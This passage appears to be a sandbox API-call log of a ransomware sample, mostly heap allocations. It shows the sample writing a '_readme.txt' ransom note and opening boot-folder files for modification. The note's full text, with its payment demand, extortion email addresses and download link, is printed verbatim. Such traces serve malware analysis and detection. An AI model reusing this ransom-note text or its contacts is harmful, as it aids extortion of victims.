(HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.547] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0183.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.547] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.548] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.548] PathFindFileNameW (pszPath="") returned="" [0183.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.548] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.548] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0183.548] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0183.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.548] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.549] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0183.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.549] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0183.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.549] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.549] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.549] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.551] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*" (normalized: "c:\\boot\\en-us\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.552] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.552] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.552] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0183.552] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.557] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0183.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.557] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0183.557] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.560] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0183.560] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 